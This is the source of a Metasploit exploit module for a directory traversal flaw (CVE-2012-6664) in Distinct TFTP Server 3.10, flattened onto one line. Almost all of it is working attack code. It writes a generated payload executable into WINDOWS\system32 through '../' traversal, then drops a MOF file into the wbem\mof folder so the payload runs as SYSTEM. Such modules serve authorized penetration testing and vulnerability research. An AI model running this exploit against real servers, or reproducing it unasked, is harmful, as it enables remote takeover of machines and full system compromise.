## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Rex::Proto::TFTP include Msf::Exploit::EXE include Msf::Exploit::WbemExec include Msf::Exploit::FileDropper def initialize(info = {}) super( update_info( info, 'Name' => 'Distinct TFTP 3.10 Writable Directory Traversal Execution', 'Description' => %q{ This module exploits a directory traversal vulnerability in the TFTP Server component of Distinct Intranet Servers version 3.10 which allows a remote attacker to write arbitrary files to the server file system, resulting in code execution under the context of 'SYSTEM'. This module has been tested successfully on TFTP Server version 3.10 on Windows XP SP3 (EN). }, 'License' => MSF_LICENSE, 'Author' => [ 'modpr0be', # Initial discovery, PoC (Tom Gregory) 'sinn3r' # Metasploit ], 'References' => [ ['OSVDB', '80984'], ['EDB', '18718'], ['URL', 'http://www.spentera.com/advisories/2012/SPN-01-2012.pdf'], ['CVE', '2012-6664'] ], 'Payload' => { 'BadChars' => "\x00" }, 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Platform' => 'win', 'Targets' => [ ['Automatic', { 'auto' => true }], ], 'Privileged' => true, 'DisclosureDate' => '2012-04-08', 'DefaultTarget' => 0, 'Notes' => { 'Reliability' => UNKNOWN_RELIABILITY, 'Stability' => UNKNOWN_STABILITY, 'SideEffects' => UNKNOWN_SIDE_EFFECTS } ) ) register_options([ OptInt.new('DEPTH', [false, 'Levels to reach base directory', 10]), OptAddress.new('RHOST', [true, 'The remote TFTP server address']), OptPort.new('RPORT', [true, 'The remote TFTP server port', 69]) ]) end def upload(filename, data) tftp_client = Rex::Proto::TFTP::Client.new( 'LocalHost' => '0.0.0.0', 'LocalPort' => 1025 + rand(0xffff - 1025), 'PeerHost' => datastore['RHOST'], 'PeerPort' => datastore['RPORT'], 'LocalFile' => "DATA:#{data}", 'RemoteFile' => filename, 'Mode' => 'octet', 'Context' => { 'Msf' => framework, 'MsfExploit' => self }, 'Action' => :upload ) tftp_client.send_write_request { |msg| print_status(msg) } until tftp_client.complete select(nil, nil, nil, 1) tftp_client.stop end end def exploit exe_name = "#{rand_text_alpha(8..15)}.exe" exe = generate_payload_exe mof_name = "#{rand_text_alpha(8..15)}.mof" mof = generate_mof(mof_name, exe_name) traversal = '../' * datastore['DEPTH'].to_i print_status("Sending EXE (#{exe.length} bytes)") upload("#{traversal}\\WINDOWS\\system32\\#{exe_name}", exe) register_file_for_cleanup(exe_name) # Let the TFTP server idle a bit before sending another file select(nil, nil, nil, 3) print_status("Sending MOF (#{mof.length} bytes)") upload("#{traversal}\\WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end end